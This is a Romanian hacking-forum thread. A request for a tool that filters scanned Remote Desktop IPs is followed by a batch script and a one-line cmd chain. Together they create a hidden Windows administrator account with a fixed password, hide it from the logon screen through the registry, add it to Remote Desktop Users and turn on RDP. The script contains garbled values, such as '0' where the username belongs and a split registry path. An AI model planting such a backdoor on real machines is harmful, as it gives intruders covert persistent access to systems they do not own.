Jump to content
Cartus_C

Scanner Remote Desktop

Recommended Posts

Dar un program sa filtreze mai bine .. adica eu dau sa scanneze pe portu X si imi gaeste 500 ip-uri de exemplu . Dintre care nu mi-a mers nici unu , eu caut un program dupa ce l-am scanat si mi-a gasit x ip-uri sa le bag in prog x si sa imi zica care din ele sunt ON sau macar functionabile ms

Edited by vasilica233
Link to comment
Share on other sites

Pentru ca sunt intrebat pe PM cum se adauga user:

Add Hidden User : Windows XP, Windows 7 , Windows Vista, Windows 2000/2003 Server

Se creaza fisier xxx.bat

Presupun ca majoritatea vor adauga acelasi user/pass deci nu e interactiv.

******COPY DE AICI

ECHO off

REM ---- Batch Script to Add Hidden User[Administrators Group] in Windows XP,03,Vista,7,08

REM ---------- 3389

REM Username is userAscuns

REM Password is password123

REM ----------

net user userAscuns password123 /add

net localgroup Administrators 0 /add

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v 0 /t REG_DWORD /d 0x00

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t"

net localgroup "Remote Desktop Users" userAscuns /add

EXIT

REM ----------

******PANA AICI

Nota:

In urmatoarele 4 linii trebuie sa modificate user sau pass:

---------------------------

REM Username is userAscuns

REM Password is password123

net user userAscuns password123 /add

net localgroup "Remote Desktop Users" userAscuns /add

---------------------------

Enable remote desktop from windows command line (se adauga in .bat file)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Ca sa iti tai craca de sub picioare (se adauga in .bat file)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

"Luat si modificat de pe net". Probat pe win7, xp

Link to comment
Share on other sites

Cred ca merg toate aste puse intr-o singura linie cu & intre ele... Ma refer pentru a nu mai creea .bat-ul si pentru un simplu copy/paste in cmd. Ms comsec333. Ceva de genul faceam si eu dar nu chiar tot:

net user USERUL PAROLA /add & Net Localgroup Administrators USERUL /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USERUL /t REG_DWORD /d 0

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...